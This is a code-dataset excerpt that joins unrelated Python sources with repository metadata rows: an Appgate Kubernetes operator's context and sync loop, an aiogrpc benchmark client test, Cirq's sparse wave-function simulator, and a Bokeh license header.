APPGATE_SSL_NO_VERIFY = 'APPGATE_OPERATOR_SSL_NO_VERIFY'
APPGATE_SSL_CACERT = 'APPGATE_OPERATOR_CACERT'
crds: Optional[CustomObjectsApi] = None
log = logging.getLogger('appgate-operator')
log.setLevel(logging.INFO)
def get_crds() -> CustomObjectsApi:
global crds
if not crds:
crds = CustomObjectsApi()
return crds
@attrs()
class Context:
namespace: str = attrib()
user: str = attrib()
password: str = attrib()
provider: str = attrib()
controller: str = attrib()
two_way_sync: bool = attrib()
timeout: int = attrib()
dry_run_mode: bool = attrib()
cleanup_mode: bool = attrib()
api_spec: APISpec = attrib()
metadata_configmap: str = attrib()
# target tags if specified tells which entities do we want to work on
target_tags: Optional[FrozenSet[str]] = attrib(default=None)
# builtin tags are the entities that we consider builtin
builtin_tags: FrozenSet[str] = attrib(default=BUILTIN_TAGS)
# exclude tags if specified tells which entities do we want to exclude
exclude_tags: Optional[FrozenSet[str]] = attrib(default=None)
no_verify: bool = attrib(default=True)
cafile: Optional[Path] = attrib(default=None)
device_id: Optional[str] = attrib(default=None)
def save_cert(cert: str) -> Path:
cert_path = Path(tempfile.mktemp())
with cert_path.open('w') as f:
if cert.startswith('-----BEGIN CERTIFICATE-----'):
f.write(cert)
else:
bytes_decoded: bytes = base64.b64decode(cert)
f.write(bytes_decoded.decode())
return cert_path
def get_tags(args: OperatorArguments) -> Iterable[Optional[FrozenSet[str]]]:
tags: List[Optional[FrozenSet[str]]] = []
for i, (tags_arg, tags_env) in enumerate([(args.target_tags, APPGATE_TARGET_TAGS_ENV),
(args.exclude_tags, APPGATE_EXCLUDE_TAGS_ENV),
(args.builtin_tags, APPGATE_BUILTIN_TAGS_ENV)]):
xs = frozenset(tags_arg) if tags_arg else frozenset()
ys = filter(None, os.getenv(tags_env, '').split(','))
ts = None
if xs or ys:
ts = xs.union(ys)
tags.append(ts)
return tags
def get_context(args: OperatorArguments,
k8s_get_secret: Optional[Callable[[str, str], str]] = None) -> Context:
namespace = args.namespace or os.getenv(NAMESPACE_ENV)
if not namespace:
raise AppgateException('Namespace must be defined in order to run the appgate-operator')
user = os.getenv(USER_ENV) or args.user
password = os.getenv(PASSWORD_ENV) or args.password
provider = os.getenv(PROVIDER_ENV) or args.provider
device_id = os.getenv(DEVICE_ID_ENV) or args.device_id
controller = os.getenv(HOST_ENV) or args.host
timeout = os.getenv(TIMEOUT_ENV) or args.timeout
two_way_sync = os.getenv(TWO_WAY_SYNC_ENV) or ('1' if args.two_way_sync else '0')
dry_run_mode = os.getenv(DRY_RUN_ENV) or ('1' if args.dry_run else '0')
cleanup_mode = os.getenv(CLEANUP_ENV) or ('1' if args.cleanup else '0')
spec_directory = os.getenv(SPEC_DIR_ENV) or args.spec_directory or SPEC_DIR
no_verify = os.getenv(APPGATE_SSL_NO_VERIFY, '0') == '1' or args.no_verify
appgate_cacert = os.getenv(APPGATE_SSL_CACERT)
appgate_cacert_path = None
verify = not no_verify
if verify and appgate_cacert:
try:
appgate_cacert_path = save_cert(appgate_cacert)
except (binascii.Error, binascii.Incomplete) as e:
raise AppgateException(f'[get-context] Unable to decode the cerificate provided: {e}')
log.debug(f'[get_context] Saving certificate in {appgate_cacert_path}')
elif verify and args.cafile:
appgate_cacert_path = args.cafile
secrets_key = os.getenv(APPGATE_SECRETS_KEY)
target_tags, exclude_tags, builtin_tags = get_tags(args)
metadata_configmap = args.metadata_configmap or f'{namespace}-configmap'
if not user or not password or not controller:
missing_envs = ','.join([x[0]
for x in [(USER_ENV, user),
(PASSWORD_ENV, password),
(HOST_ENV, controller)]
if x[1] is None])
raise AppgateException(f'Unable to create appgate-controller context, missing: {missing_envs}')
api_spec = generate_api_spec(spec_directory=Path(spec_directory) if spec_directory else None,
secrets_key=secrets_key,
k8s_get_secret=k8s_get_secret)
return Context(namespace=namespace, user=user, password=password,
provider=provider,
device_id=device_id,
controller=controller, timeout=int(timeout),
dry_run_mode=dry_run_mode == '1',
cleanup_mode=cleanup_mode == '1',
two_way_sync=two_way_sync == '1',
api_spec=api_spec,
no_verify=no_verify,
target_tags=target_tags if target_tags else None,
builtin_tags=builtin_tags if builtin_tags else BUILTIN_TAGS,
exclude_tags=exclude_tags if exclude_tags else None,
metadata_configmap=metadata_configmap,
cafile=appgate_cacert_path)
def init_kubernetes(args: OperatorArguments) -> Context:
if 'KUBERNETES_PORT' in os.environ:
load_incluster_config()
# TODO: Discover it somehow
# https://github.com/kubernetes-client/python/issues/363
namespace = args.namespace or os.getenv(NAMESPACE_ENV)
else:
load_kube_config()
namespace = args.namespace or os.getenv(NAMESPACE_ENV) or list_kube_config_contexts()[1]['context'].get('namespace')
if not namespace:
raise AppgateException('Unable to discover namespace, please provide it.')
ns: str = namespace # lambda thinks it's an Optional
return get_context(
args=args,
k8s_get_secret=lambda secret, key: k8s_get_secret(
namespace=ns,
key=key,
secret=secret
))
def exclude_appgate_entities(entities: List[Entity_T], target_tags: Optional[FrozenSet[str]],
exclude_tags: Optional[FrozenSet[str]]) -> Set[EntityWrapper]:
"""
Filter out entities according to target_tags and exclude_rags
Returns the entities that are member of target_tags (all entities if None)
but not member of exclude_tags
"""
return set(filter(lambda e: is_target(e, target_tags) and not has_tag(e, exclude_tags),
[EntityWrapper(e) for e in entities]))
async def get_current_appgate_state(ctx: Context) -> AppgateState:
"""
Gets the current AppgateState for controller
"""
api_spec = ctx.api_spec
log.info('[appgate-operator/%s] Updating current state from controller',
ctx.namespace)
if ctx.no_verify:
log.warning('[appgate-operator/%s] Ignoring SSL certificates!',
ctx.namespace)
if ctx.device_id is None:
raise AppgateException('No device id specified')
async with AppgateClient(controller=ctx.controller, user=ctx.user,
password=ctx.password, provider=ctx.provider,
device_id=ctx.device_id,
version=api_spec.api_version,
no_verify=ctx.no_verify,
cafile=ctx.cafile) as appgate_client:
if not appgate_client.authenticated:
log.error('[appgate-operator/%s] Unable to authenticate with controller',
ctx.namespace)
raise AppgateException('Error authenticating')
entity_clients = generate_api_spec_clients(api_spec=api_spec,
appgate_client=appgate_client)
entities_set = {}
for entity, client in entity_clients.items():
entities = await client.get()
if entities is not None:
entities_set[entity] = EntitiesSet(
exclude_appgate_entities(entities, ctx.target_tags, ctx.exclude_tags))
if len(entities_set) < len(entity_clients):
log.error('[appgate-operator/%s] Unable to get entities from controller',
ctx.namespace)
raise AppgateException('Error reading current state')
appgate_state = AppgateState(entities_set=entities_set)
return appgate_state
def run_entity_loop(ctx: Context, crd: str, loop: asyncio.AbstractEventLoop,
queue: Queue[AppgateEvent],
load: Callable[[Dict[str, Any], Optional[Dict[str, Any]], type], Entity_T],
entity_type: type, singleton: bool, k8s_configmap_client: K8SConfigMapClient):
namespace = ctx.namespace
log.info(f'[{crd}/{namespace}] Loop for {crd}/{namespace} started')
watcher = Watch().stream(get_crds().list_namespaced_custom_object, K8S_APPGATE_DOMAIN,
K8S_APPGATE_VERSION, namespace, crd)
while True:
try:
data = next(watcher)
data_obj = data['object']
data_mt = data_obj['metadata']
kind = data_obj['kind']
spec = data_obj['spec']
event = EventObject(metadata=data_mt, spec=spec, kind=kind)
if singleton:
name = 'singleton'
else:
name = event.spec['name']
if event:
ev = K8SEvent(data['type'], event)
try:
# names are not unique between entities so we need to come up with a unique name
# now
mt = ev.object.metadata
latest_entity_generation = k8s_configmap_client.read_entity_generation(entity_unique_id(kind, name))
if latest_entity_generation:
mt[APPGATE_METADATA_LATEST_GENERATION_FIELD] = latest_entity_generation.generation
mt[APPGATE_METADATA_MODIFICATION_FIELD] = dump_datetime(latest_entity_generation.modified)
entity = load(ev.object.spec, ev.object.metadata, entity_type)
except TypedloadTypeError:
log.exception('[%s/%s] Unable to parse event %s', crd, namespace, event)
continue
log.debug('[%s/%s] K8SEvent type: %s: %s', crd, namespace, ev.type, entity)
asyncio.run_coroutine_threadsafe(queue.put(AppgateEvent(op=ev.type, entity=entity)),
loop)
except ApiException:
log.exception('[appgate-operator/%s] Error when subscribing events in k8s for %s',
namespace, crd)
sys.exit(1)
except Exception:
log.exception('[appgate-operator/%s] Unhandled error for %s', namespace, crd)
sys.exit(1)
async def start_entity_loop(ctx: Context, crd: str, entity_type: Type[Entity_T],
singleton: bool, queue: Queue[AppgateEvent],
k8s_configmap_client: K8SConfigMapClient) -> None:
log.debug('[%s/%s] Starting loop event for entities on path: %s', crd, ctx.namespace,
crd)
def run(loop: asyncio.AbstractEventLoop) -> None:
t = threading.Thread(target=run_entity_loop,
args=(ctx, crd, loop, queue, K8S_LOADER.load, entity_type, singleton,
k8s_configmap_client),
daemon=True)
t.start()
await asyncio.to_thread(run, asyncio.get_event_loop()) # type: ignore
async def main_loop(queue: Queue, ctx: Context, k8s_configmap_client: K8SConfigMapClient) -> None:
namespace = ctx.namespace
log.info('[appgate-operator/%s] Main loop started:', namespace)
log.info('[appgate-operator/%s] + namespace: %s', namespace, namespace)
log.info('[appgate-operator/%s] + host: %s', namespace, ctx.controller)
log.info('[appgate-operator/%s] + timeout: %s', namespace, ctx.timeout)
log.info('[appgate-operator/%s] + dry-run: %s', namespace, ctx.dry_run_mode)
log.info('[appgate-operator/%s] + cleanup: %s', namespace, ctx.cleanup_mode)
log.info('[appgate-operator/%s] + two-way-sync: %s', namespace, ctx.two_way_sync)
log.info('[appgate-operator/%s] Getting current state from controller',
namespace)
current_appgate_state = await get_current_appgate_state(ctx=ctx)
if ctx.cleanup_mode:
expected_appgate_state = AppgateState(
{k: v.entities_with_tags(ctx.builtin_tags) for k, v in current_appgate_state.entities_set.items()})
else:
expected_appgate_state = deepcopy(current_appgate_state)
log.info('[appgate-operator/%s] Ready to get new events and compute a new plan',
namespace)
while True:
try:
event: AppgateEvent = await asyncio.wait_for(queue.get(), timeout=ctx.timeout)
log.info('[appgate-operator/%s}] Event op: %s %s with name %s', namespace,
event.op, str(type(event.entity)), event.entity.name)
expected_appgate_state.with_entity(EntityWrapper(event.entity), event.op, current_appgate_state)
except asyncio.exceptions.TimeoutError:
# Log all entities in expected state
log.info('[appgate-operator/%s] Expected entities:', namespace)
for entity_type, xs in expected_appgate_state.entities_set.items():
for entity_name, e in xs.entities_by_name.items():
log.info('[appgate-operator/%s] %s: %s: %s', namespace, entity_type, entity_name,
e.id)
# Resolve entities now, in order
# this will be the Topological sort
total_conflicts = resolve_appgate_state(appgate_state=expected_appgate_state,
reverse=False,
api_spec=ctx.api_spec)
if total_conflicts:
log.error('[appgate-operator/%s] Found errors in expected state and plan can'
' not be applied.', namespace)
entities_conflict_summary(conflicts=total_conflicts, namespace=namespace)
log.info('[appgate-operator/%s] Waiting for more events that can fix the state.',
namespace)
continue
if ctx.two_way_sync:
# use current appgate state from controller instead of from memory
current_appgate_state = await get_current_appgate_state(ctx=ctx)
# Create a plan
# Need to copy?
# Now we use dicts so resolving update the contents of the keys
plan = create_appgate_plan(current_appgate_state, expected_appgate_state,
ctx.builtin_tags,)
if plan.needs_apply:
log.info('[appgate-operator/%s] No more events for a while, creating a plan',
namespace)
async with AsyncExitStack() as exit_stack:
appgate_client = None
if not ctx.dry_run_mode:
if ctx.device_id is None:
raise AppgateException('No device id specified')
appgate_client = await exit_stack.enter_async_context(AppgateClient(
controller=ctx.controller,
user=ctx.user, password=ctx.password, provider=ctx.provider,
device_id=ctx.device_id,
version=ctx.api_spec.api_version, no_verify=ctx.no_verify,
cafile=ctx.cafile))
else:
log.warning('[appgate-operator/%s] Running in dry-mode, nothing will be created',
namespace)
new_plan = await appgate_plan_apply(appgate_plan=plan, namespace=namespace,
entity_clients=generate_api_spec_clients(
api_spec=ctx.api_spec,
appgate_client=appgate_client)
if appgate_client else {},
k8s_configmap_client=k8s_configmap_client,
api_spec=ctx.api_spec)
if len(new_plan.errors) > 0:
log.error('[appgate-operator/%s] Found errors when applying plan:', namespace)
for err in new_plan.errors:
log.error('[appgate-operator/%s] Error %s:', namespace, err)
sys.exit(1)
if appgate_client:
current_appgate_state = new_plan.appgate_state
expected_appgate_state = expected_appgate_state.sync_generations()
else:
log.info('[appgate-operator/%s] Nothing changed! Keeping watching!', namespace)
| 48.342298
| 124
| 0.624671
|
5f4bbbdba6a262ea1be61f528fac8cd9dd11baf0
| 3,051
|
py
|
Python
|
test/test_client_aio.py
|
tsangpozheng/asyncgrpc
|
79ba732ab74d15ad02ef94763259298554198899
|
[
"MIT"
] | 2
|
2018-11-06T04:43:06.000Z
|
2018-12-05T09:20:02.000Z
|
test/test_client_aio.py
|
tsangpozheng/asyncgrpc
|
79ba732ab74d15ad02ef94763259298554198899
|
[
"MIT"
] | null | null | null |
test/test_client_aio.py
|
tsangpozheng/asyncgrpc
|
79ba732ab74d15ad02ef94763259298554198899
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('.')
sys.path.append('../pybase/')
import logging
import asyncio
from aiogrpc import Channel
from protos import benchmark_pb2
from protos import benchmark_pb2_grpc
messages = [
benchmark_pb2.HelloRequest(name='First'),
benchmark_pb2.HelloRequest(name='Second'),
benchmark_pb2.HelloRequest(name='3'),
benchmark_pb2.HelloRequest(name='4'),
]
def generate_messages():
for msg in messages:
print("Sending %s" % (msg.name))
yield msg
async def generate_messages_async():
for msg in messages:
await asyncio.sleep(1)
print("Sending async %s" % (msg.name))
yield msg
async def test(stub):
responses = await stub.SayHelloSS(generate_messages())
async for response in responses:
print("Received SS %s" % (response.message))
responses = await stub.SayHelloSS(generate_messages_async())
async for response in responses:
print("Received async SS %s" % (response.message))
response = await stub.SayHelloSU(generate_messages())
print("Received SU %s" % (response.message))
response = await stub.SayHelloSU(generate_messages_async())
print("Received async SU %s" % (response.message))
responses = await stub.SayHelloUS(benchmark_pb2.HelloRequest(name='im US'))
async for response in responses:
print("Received US %s" % (response.message))
response = await stub.SayHelloUU(benchmark_pb2.HelloRequest(name='im UU'))
print("Received UU %s" % (response.message))
async def test0(stub):
responses = await stub.SayHelloSS(generate_messages())
async for response in responses:
print("Received SS %s" % (response.message))
responses = await stub.SayHelloSS(generate_messages_async())
async for response in responses:
print("Received SS %s" % (response.message))
async def atest(stub):
await test(stub)
await test(stub)
logging.basicConfig(level=logging.INFO)
stub = benchmark_pb2_grpc.GreeterStub(Channel('127.0.0.1:5001'))
async def bench():
for i in range(2000):
responses = await stub.SayHelloSS(generate_messages())
async for response in responses:
print("Received SS %s" % (response.message))
response = await stub.SayHelloSU(generate_messages())
print("Received SU %s" % (response.message))
responses = await stub.SayHelloUS(
benchmark_pb2.HelloRequest(name='im US'))
async for response in responses:
print("Received US %s" % (response.message))
response = await stub.SayHelloUU(
benchmark_pb2.HelloRequest(name='im UU'))
print("Received UU %s" % (response.message))
def run():
loop = asyncio.get_event_loop()
t1 = asyncio.ensure_future(test(stub))
t2 = asyncio.ensure_future(test(stub))
loop.run_until_complete(asyncio.wait([t1, t2]))
def run():
loop = asyncio.get_event_loop()
loop.run_until_complete(bench())
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
run()
| 27.736364
| 79
| 0.678466
|
899a539a5233a4feb2e6c981ea34962902f225de
| 20,820
|
py
|
Python
|
cirq/sim/sparse_simulator.py
|
aditya-giri/Cirq
|
e5af689f184c8c5ccd9c076b2907a444b2479629
|
[
"Apache-2.0"
] | null | null | null |
cirq/sim/sparse_simulator.py
|
aditya-giri/Cirq
|
e5af689f184c8c5ccd9c076b2907a444b2479629
|
[
"Apache-2.0"
] | null | null | null |
cirq/sim/sparse_simulator.py
|
aditya-giri/Cirq
|
e5af689f184c8c5ccd9c076b2907a444b2479629
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simulator that uses numpy's einsum or sparse matrix operations."""
import collections
from typing import Dict, Iterator, List, Tuple, Type, TYPE_CHECKING
import numpy as np
from cirq import circuits, linalg, ops, protocols, qis, study, value
from cirq.sim import simulator, wave_function, wave_function_simulator
if TYPE_CHECKING:
import cirq
class _FlipGate(ops.SingleQubitGate):
"""A unitary gate that flips the |0> state with another state.
Used by `Simulator` to reset a qubit.
"""
def __init__(self, dimension: int, reset_value: int):
assert 0 < reset_value < dimension
self.dimension = dimension
self.reset_value = reset_value
def _qid_shape_(self) -> Tuple[int, ...]:
return (self.dimension,)
def _apply_unitary_(self, args: 'protocols.ApplyUnitaryArgs') -> np.ndarray:
args.available_buffer[..., 0] = args.target_tensor[..., self.
reset_value]
args.available_buffer[..., self.
reset_value] = args.target_tensor[..., 0]
return args.available_buffer
# Mutable named tuple to hold state and a buffer.
class _StateAndBuffer():
def __init__(self, state, buffer):
self.state = state
self.buffer = buffer
class Simulator(simulator.SimulatesSamples,
wave_function_simulator.SimulatesIntermediateWaveFunction):
"""A sparse matrix wave function simulator that uses numpy.
This simulator can be applied on circuits that are made up of operations
that have a `_unitary_` method, or `_has_unitary_` and
`_apply_unitary_`, `_mixture_` methods, are measurements, or support a
`_decompose_` method that returns operations satisfying these same
conditions. That is to say, the operations should follow the
`cirq.SupportsConsistentApplyUnitary` protocol, the `cirq.SupportsUnitary`
protocol, the `cirq.SupportsMixture` protocol, or the
`cirq.CompositeOperation` protocol. It is also permitted for the circuit
to contain measurements which are operations that support
`cirq.SupportsChannel` and `cirq.SupportsMeasurementKey`
This simulator supports three types of simulation.
Run simulations which mimic running on actual quantum hardware. These
simulations do not give access to the wave function (like actual hardware).
There are two variations of run methods, one which takes in a single
(optional) way to resolve parameterized circuits, and a second which
takes in a list or sweep of parameter resolver:
run(circuit, param_resolver, repetitions)
run_sweep(circuit, params, repetitions)
The simulation performs optimizations if the number of repetitions is
greater than one and all measurements in the circuit are terminal (at the
end of the circuit). These methods return `TrialResult`s which contain both
the measurement results, but also the parameters used for the parameterized
circuit operations. The initial state of a run is always the all 0s state
in the computational basis.
By contrast the simulate methods of the simulator give access to the
wave function of the simulation at the end of the simulation of the circuit.
These methods take in two parameters that the run methods do not: a
qubit order and an initial state. The qubit order is necessary because an
ordering must be chosen for the kronecker product (see
`SparseSimulationTrialResult` for details of this ordering). The initial
state can be either the full wave function, or an integer which represents
the initial state of being in a computational basis state for the binary
representation of that integer. Similar to run methods, there are two
simulate methods that run for single runs or for sweeps across different
parameters:
simulate(circuit, param_resolver, qubit_order, initial_state)
simulate_sweep(circuit, params, qubit_order, initial_state)
The simulate methods in contrast to the run methods do not perform
repetitions. The result of these simulations is a
`SparseSimulationTrialResult` which contains, in addition to measurement
results and information about the parameters that were used in the
simulation,access to the state via the `state` method and `StateVectorMixin`
methods.
If one wishes to perform simulations that have access to the
wave function as one steps through running the circuit there is a generator
which can be iterated over and each step is an object that gives access
to the wave function. This stepping through a `Circuit` is done on a
`Moment` by `Moment` manner.
simulate_moment_steps(circuit, param_resolver, qubit_order,
initial_state)
One can iterate over the moments via
for step_result in simulate_moments(circuit):
# do something with the wave function via step_result.state
Note also that simulations can be stochastic, i.e. return different results
for different runs. The first version of this occurs for measurements,
where the results of the measurement are recorded. This can also
occur when the circuit has mixtures of unitaries.
See `Simulator` for the definitions of the supported methods.
"""
def __init__(self,
*,
dtype: Type[np.number] = np.complex64,
seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None):
"""A sparse matrix simulator.
Args:
dtype: The `numpy.dtype` used by the simulation. One of
`numpy.complex64` or `numpy.complex128`.
seed: The random seed to use for this simulator.
"""
if np.dtype(dtype).kind != 'c':
raise ValueError(
'dtype must be a complex type but was {}'.format(dtype))
self._dtype = dtype
self._prng = value.parse_random_state(seed)
def _run(
self,
circuit: circuits.Circuit,
param_resolver: study.ParamResolver,
repetitions: int) -> Dict[str, List[np.ndarray]]:
"""See definition in `cirq.SimulatesSamples`."""
param_resolver = param_resolver or study.ParamResolver({})
resolved_circuit = protocols.resolve_parameters(circuit, param_resolver)
self._check_all_resolved(resolved_circuit)
def measure_or_mixture(op):
return protocols.is_measurement(op) or protocols.has_mixture(op)
if circuit.are_all_matches_terminal(measure_or_mixture):
return self._run_sweep_sample(resolved_circuit, repetitions)
return self._run_sweep_repeat(resolved_circuit, repetitions)
def _run_sweep_sample(
self,
circuit: circuits.Circuit,
repetitions: int) -> Dict[str, List[np.ndarray]]:
for step_result in self._base_iterator(
circuit=circuit,
qubit_order=ops.QubitOrder.DEFAULT,
initial_state=0,
perform_measurements=False):
pass
# We can ignore the mixtures since this is a run method which
# does not return the state.
measurement_ops = [op for _, op, _ in
circuit.findall_operations_with_gate_type(
ops.MeasurementGate)]
return step_result.sample_measurement_ops(measurement_ops,
repetitions,
seed=self._prng)
def _run_sweep_repeat(
self,
circuit: circuits.Circuit,
repetitions: int) -> Dict[str, List[np.ndarray]]:
measurements = {} # type: Dict[str, List[np.ndarray]]
if repetitions == 0:
for _, op, _ in circuit.findall_operations_with_gate_type(
ops.MeasurementGate):
measurements[protocols.measurement_key(op)] = np.empty([0, 1])
for _ in range(repetitions):
all_step_results = self._base_iterator(
circuit,
qubit_order=ops.QubitOrder.DEFAULT,
initial_state=0)
for step_result in all_step_results:
for k, v in step_result.measurements.items():
if not k in measurements:
measurements[k] = []
measurements[k].append(np.array(v, dtype=np.uint8))
return {k: np.array(v) for k, v in measurements.items()}
def _simulator_iterator(
self,
circuit: circuits.Circuit,
param_resolver: study.ParamResolver,
qubit_order: ops.QubitOrderOrList,
initial_state: 'cirq.STATE_VECTOR_LIKE',
) -> Iterator:
"""See definition in `cirq.SimulatesIntermediateState`.
If the initial state is an int, the state is set to the computational
basis state corresponding to this state. Otherwise if the initial
state is a np.ndarray it is the full initial state. In this case it
must be the correct size, be normalized (an L2 norm of 1), and
be safely castable to an appropriate dtype for the simulator.
"""
param_resolver = param_resolver or study.ParamResolver({})
resolved_circuit = protocols.resolve_parameters(circuit, param_resolver)
self._check_all_resolved(resolved_circuit)
actual_initial_state = 0 if initial_state is None else initial_state
return self._base_iterator(resolved_circuit,
qubit_order,
actual_initial_state,
perform_measurements=True)
def _base_iterator(
self,
circuit: circuits.Circuit,
qubit_order: ops.QubitOrderOrList,
initial_state: 'cirq.STATE_VECTOR_LIKE',
perform_measurements: bool = True,
) -> Iterator:
qubits = ops.QubitOrder.as_qubit_order(qubit_order).order_for(
circuit.all_qubits())
num_qubits = len(qubits)
qid_shape = protocols.qid_shape(qubits)
qubit_map = {q: i for i, q in enumerate(qubits)}
state = qis.to_valid_state_vector(initial_state,
num_qubits,
qid_shape=qid_shape,
dtype=self._dtype)
if len(circuit) == 0:
yield SparseSimulatorStep(state, {}, qubit_map, self._dtype)
def on_stuck(bad_op: ops.Operation):
return TypeError(
"Can't simulate unknown operations that don't specify a "
"_unitary_ method, a _decompose_ method, "
"(_has_unitary_ + _apply_unitary_) methods,"
"(_has_mixture_ + _mixture_) methods, or are measurements."
": {!r}".format(bad_op))
def keep(potential_op: ops.Operation) -> bool:
# The order of this is optimized to call has_xxx methods first.
return (protocols.has_unitary(potential_op) or
protocols.has_mixture(potential_op) or
protocols.is_measurement(potential_op) or
isinstance(potential_op.gate, ops.ResetChannel))
data = _StateAndBuffer(state=np.reshape(state, qid_shape),
buffer=np.empty(qid_shape, dtype=self._dtype))
for moment in circuit:
measurements = collections.defaultdict(
list) # type: Dict[str, List[int]]
unitary_ops_and_measurements = protocols.decompose(
moment, keep=keep, on_stuck_raise=on_stuck)
for op in unitary_ops_and_measurements:
indices = [qubit_map[qubit] for qubit in op.qubits]
if isinstance(op.gate, ops.ResetChannel):
self._simulate_reset(op, data, indices)
elif protocols.has_unitary(op):
self._simulate_unitary(op, data, indices)
elif protocols.is_measurement(op):
# Do measurements second, since there may be mixtures that
# operate as measurements.
# TODO: support measurement outside the computational basis.
# Github issue:
# https://github.com/quantumlib/Cirq/issues/1357
if perform_measurements:
self._simulate_measurement(op, data, indices,
measurements, num_qubits)
elif protocols.has_mixture(op):
self._simulate_mixture(op, data, indices)
yield SparseSimulatorStep(
state_vector=data.state,
measurements=measurements,
qubit_map=qubit_map,
dtype=self._dtype)
def _simulate_unitary(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int]) -> None:
"""Simulate an op that has a unitary."""
result = protocols.apply_unitary(
op,
args=protocols.ApplyUnitaryArgs(
data.state,
data.buffer,
indices))
if result is data.buffer:
data.buffer = data.state
data.state = result
def _simulate_reset(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int]) -> None:
"""Simulate an op that is a reset to the |0> state."""
if isinstance(op.gate, ops.ResetChannel):
reset = op.gate
# Do a silent measurement.
bits, _ = wave_function.measure_state_vector(
data.state, indices, out=data.state, qid_shape=data.state.shape)
# Apply bit flip(s) to change the reset the bits to 0.
for b, i, d in zip(bits, indices, protocols.qid_shape(reset)):
if b == 0:
continue # Already zero, no reset needed
reset_unitary = _FlipGate(d, reset_value=b)(*op.qubits)
self._simulate_unitary(reset_unitary, data, [i])
def _simulate_measurement(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int],
measurements: Dict[str, List[int]],
num_qubits: int) -> None:
"""Simulate an op that is a measurement in the computational basis."""
# TODO: support measurement outside computational basis.
# Github issue: https://github.com/quantumlib/Cirq/issues/1357
if isinstance(op.gate, ops.MeasurementGate):
meas = op.gate
invert_mask = meas.full_invert_mask()
# Measure updates inline.
bits, _ = wave_function.measure_state_vector(
data.state,
indices,
out=data.state,
qid_shape=data.state.shape,
seed=self._prng)
corrected = [
bit ^ (bit < 2 and mask)
for bit, mask in zip(bits, invert_mask)
]
key = protocols.measurement_key(meas)
measurements[key].extend(corrected)
def _simulate_mixture(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int]) -> None:
"""Simulate an op that is a mixtures of unitaries."""
probs, unitaries = zip(*protocols.mixture(op))
# We work around numpy barfing on choosing from a list of
# numpy arrays (which is not `one-dimensional`) by selecting
# the index of the unitary.
index = self._prng.choice(range(len(unitaries)), p=probs)
shape = protocols.qid_shape(op) * 2
unitary = unitaries[index].astype(self._dtype).reshape(shape)
result = linalg.targeted_left_multiply(unitary, data.state, indices,
out=data.buffer)
data.buffer = data.state
data.state = result
def _check_all_resolved(self, circuit):
"""Raises if the circuit contains unresolved symbols."""
if protocols.is_parameterized(circuit):
unresolved = [
op for moment in circuit for op in moment
if protocols.is_parameterized(op)
]
raise ValueError(
'Circuit contains ops whose symbols were not specified in '
'parameter sweep. Ops: {}'.format(unresolved))
class SparseSimulatorStep(wave_function.StateVectorMixin,
wave_function_simulator.WaveFunctionStepResult):
"""A `StepResult` that includes `StateVectorMixin` methods."""
def __init__(self, state_vector, measurements, qubit_map, dtype):
"""Results of a step of the simulator.
Args:
qubit_map: A map from the Qubits in the Circuit to the the index
of this qubit for a canonical ordering. This canonical ordering
is used to define the state vector (see the state_vector()
method).
measurements: A dictionary from measurement gate key to measurement
results, ordered by the qubits that the measurement operates on.
"""
super().__init__(measurements=measurements, qubit_map=qubit_map)
self._dtype = dtype
size = np.prod(protocols.qid_shape(self), dtype=int)
self._state_vector = np.reshape(state_vector, size)
def _simulator_state(self
) -> wave_function_simulator.WaveFunctionSimulatorState:
return wave_function_simulator.WaveFunctionSimulatorState(
qubit_map=self.qubit_map,
state_vector=self._state_vector)
def state_vector(self):
"""Return the wave function at this point in the computation.
The state is returned in the computational basis with these basis
states defined by the qubit_map. In particular the value in the
qubit_map is the index of the qubit, and these are translated into
binary vectors where the last qubit is the 1s bit of the index, the
second-to-last is the 2s bit of the index, and so forth (i.e. big
endian ordering).
Example:
qubit_map: {QubitA: 0, QubitB: 1, QubitC: 2}
Then the returned vector will have indices mapped to qubit basis
states like the following table
| | QubitA | QubitB | QubitC |
| :-: | :----: | :----: | :----: |
| 0 | 0 | 0 | 0 |
| 1 | 0 | 0 | 1 |
| 2 | 0 | 1 | 0 |
| 3 | 0 | 1 | 1 |
| 4 | 1 | 0 | 0 |
| 5 | 1 | 0 | 1 |
| 6 | 1 | 1 | 0 |
| 7 | 1 | 1 | 1 |
"""
return self._simulator_state().state_vector
def set_state_vector(self, state: 'cirq.STATE_VECTOR_LIKE'):
update_state = qis.to_valid_state_vector(state,
len(self.qubit_map),
qid_shape=protocols.qid_shape(
self, None),
dtype=self._dtype)
np.copyto(self._state_vector, update_state)
def sample(self,
qubits: List[ops.Qid],
repetitions: int = 1,
seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None) -> np.ndarray:
indices = [self.qubit_map[qubit] for qubit in qubits]
return wave_function.sample_state_vector(self._state_vector,
indices,
qid_shape=protocols.qid_shape(
self, None),
repetitions=repetitions,
seed=seed)
| 45.657895
| 80
| 0.604131
|
f4263c819d6af239aa4e65d1b1fdc01963728454
| 379
|
py
|
Python
|
bokeh/models/widgets/panels.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 445
|
2019-01-26T13:50:26.000Z
|
2022-03-18T05:17:38.000Z
|
bokeh/models/widgets/panels.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 242
|
2019-01-29T15:48:27.000Z
|
2022-03-31T22:09:21.000Z
|
bokeh/models/widgets/panels.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 31
|
2019-03-10T09:51:27.000Z
|
2022-02-14T23:11:12.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
